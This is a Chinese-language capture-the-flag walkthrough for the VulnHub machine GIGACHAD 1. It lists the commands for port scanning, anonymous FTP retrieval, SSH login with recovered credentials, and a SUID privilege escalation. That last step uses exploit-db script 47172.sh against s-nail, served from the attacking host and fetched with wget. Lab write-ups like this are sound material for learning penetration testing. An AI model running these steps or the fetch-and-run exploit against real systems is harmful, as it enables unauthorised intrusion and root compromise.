文章目录
GIGACHAD 1实战演练
一、前期准备
1、相关信息
靶机网站:https://www.vulnhub.com/entry/gigachad-1,657/
设备名称 | IP地址 |
---|---|
攻击机:kali | 192.168.2.78 |
靶机:GIGACHAD 1 | 192.168.2.33 |
二、信息收集
1、端口扫描
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.2.33
# 开放FTP:21端口、SSH:22端口、WEB:80端口
# FTP:21端口版本号为vsfpd3.0.3,匿名登录有个文件
# SSH:22端口版本号为OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
# WEB:80端口中间件为Apache httpd 2.4.38
2、FTP登录
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.2.33
3、查看文件类型
┌──(kali㉿kali)-[~]
└─$ file chadinfo
# 文件类型为zip压缩包
4、解压文件
# 解压文件
┌──(kali㉿kali)-[~]
└─$ unzip chadinfo
# 查看文件
┌──(kali㉿kali)-[~]
└─$ cat chadinfo
# 用户名:chad
# 密码见图片
5、访问网站
http://192.168.2.33/
6、访问图片并保存
http://192.168.2.33/drippinchad.png
┌──(kali㉿kali)-[~]
└─$ wget "http://192.168.2.33/drippinchad.png"
7、查看图片内容
# 用户名:chad
# 密码:maidenstower
8、远程连接
┌──(kali㉿kali)-[~]
└─$ ssh chad@192.168.2.33
三、后渗透
1、查看第一个flag
chad@gigachad:~$ ls -alh
chad@gigachad:~$ cat user.txt
2、查找SUID文件
chad@gigachad:~$ find / -perm -u=s -type f 2>/dev/null
3、查找POC
┌──(kali㉿kali)-[~]
└─$ searchsploit s-nail
┌──(kali㉿kali)-[~]
└─$ cp -r /usr/share/exploitdb/exploits/multiple/local/47172.sh /home/kali
4、下载文件
┌──(kali㉿kali)-[~]
└─$ python3 -m http.server
chad@gigachad:~$ wget "http://192.168.2.78:8000/47172.sh"
5、赋权限并执行脚本
chad@gigachad:~$ chmod +x 47172.sh
chad@gigachad:~$ while true;do ./47172.sh;done
6、查看第二个flag
# 美化终端
python3 -c "import pty;pty.spawn('/bin/bash')"
# 查看第二个flag
root@gigachad:~# cd /root/
root@gigachad:/root# ls -alh
root@gigachad:/root# cat root.txt